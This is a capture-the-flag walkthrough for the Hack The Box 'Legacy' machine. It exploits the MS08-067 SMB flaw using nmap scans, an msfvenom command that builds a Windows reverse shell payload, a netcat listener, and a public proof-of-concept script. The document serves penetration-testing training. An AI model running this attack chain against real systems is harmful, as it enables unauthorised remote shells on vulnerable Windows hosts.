# Hack The Box - Legacy Walkthrough without Metasploit
## Enumeration
We start using nmap to enumerate the box with the following flags:
-sC Script scan, equivalent to --script=default
-sV Service version info
-A Enable OS detection, version detection, script scanning, and traceroute
```
nmap -sC -sV -A 10.10.10.4
```
We have SMB port 445 open so we can run nmap againg with vulnerability script on that port, the OS part will be useful later.
```
nmap --script smb-vuln* -p445 10.10.10.4
```
Since there are multiple smb-vuln scripts, with the last **\*** we will run them all on port 445 of our victim box.
It is vulnerable to CVE-2008-4250 (MS08-067) which affects the systems that have highest chances to be running in our victim.
### Finding the PoC
With a quick google search we can find this github repository:
####
It's a great resource that will let us place there our msfvenom payload and execute it in order to exploit the vulnerability.
### Modifying the PoC
This will generate a reverse tcp for a 32 bits Windows, excluding the characters indicated with the -b flag.
```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```
This part of the exploit is the one that we will change with our own msfvenom payload.
### Executing the PoC
First we should have a netcat listening already set in order to catch the reverse tcp shell.
```
nc -nvlp 443
```
We might run into this problem while trying to execute the exploit:
In order to fix it we just need to install **Impacket** and **PyCrypto.**
For Impacket:
```
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip install .
```
For PyCrypto:
```
pip install pycrypto
```
Once we have that fixed we can just execute it with the arguments needed.
According with our previous enumeration we had high chances for this box to be Windows XP SP3, so we tested with option 6.
```
python ms08_067_2018.py 10.10.10.4 6 445
```
## Pwnd
